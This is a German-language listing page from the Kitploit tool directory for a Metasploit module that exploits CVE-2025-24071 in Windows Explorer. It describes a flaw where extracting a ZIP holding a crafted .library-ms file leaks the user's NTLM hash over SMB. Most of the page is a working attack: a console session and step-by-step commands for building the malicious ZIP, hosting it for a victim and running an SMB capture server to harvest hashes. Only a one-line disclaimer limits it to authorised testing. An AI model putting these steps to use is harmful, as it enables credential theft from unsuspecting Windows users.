Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
Tools/GitHubGitHub/zbs54/blackash-cve-2025-24071
Exploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstests
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Blackash-CVE-2025-24071

CVE-2025-24071: NTLM-Hash-Leck durch .library-ms-Datei, Metasploit-Modul 🚨

Beschreibung

Die Offenlegung vertraulicher Informationen gegenüber einem unbefugten Akteur im Windows-Datei-Explorer ermöglicht es einem unbefugten Angreifer, Spoofing über ein Netzwerk durchzuführen.

Metriken

CNA: Microsoft Corporation Basisbewertung: 6.5 MITTEL 🟠 Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Überblick

Die Sicherheitslücke tritt auf, wenn ein Benutzer ein ZIP-Archiv mit einer speziell präparierten .library-ms-Datei extrahiert. Der Windows-Explorer initiiert automatisch eine SMB-Authentifizierungsanfrage an einen in der Datei angegebenen Remote-Server, wodurch der NTLM-Hash des Benutzers ohne Benutzerinteraktion preisgegeben wird.

Dieses Metasploit-Modul:

  1. Erstellt eine schädliche .library-ms-Datei.
  2. Packt sie in ein ZIP-Archiv.
  3. Integriert die SMB-Erfassungsfunktionalität von Metasploit, um NTLM-Hashes zu sammeln.
root@kitploit:~
Tool herunterladen
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v6.4.64-dev ] + -- --=[ 2519 exploits - 1296 auxiliary - 431 post ] + -- --=[ 1616 payloads - 49 encoders - 13 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ msf6 > use auxiliary/server/ntlm_hash_leak msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1 ATTACKER_IP => 192.168.1.1 msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip FILNAME => exploit.zip msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms LIBRARY_NAME => malicious.library-ms msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared set SHARE_NAME => shared msf6 auxiliary(server/ntlm_hash_leak) > run [*] Malicious ZIP file created: exploit.zip [*] Host the file and wait for the victim to extract it. [*] Ensure you have an SMB capture server running to collect NTLM hashes. [*] Auxiliary module execution completed

Installation

  1. Klonen Sie das Repository:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

Verwendung

  1. Laden Sie das Modul:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. Legen Sie die erforderlichen Optionen fest:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. Führen Sie das Modul aus:
root@kitploit:~
run
  1. Das Modul erstellt eine schädliche ZIP-Datei (exploit.zip). Hosten Sie diese Datei, damit das Opfer sie herunterladen und extrahieren kann.
  2. Verwenden Sie das SMB-Erfassungsmodul von Metasploit, um NTLM-Hashes zu sammeln:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

Haftungsausschluss ⚠️

Nur für Bildungs- und Forschungszwecke. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie die Erlaubnis zum Testen haben.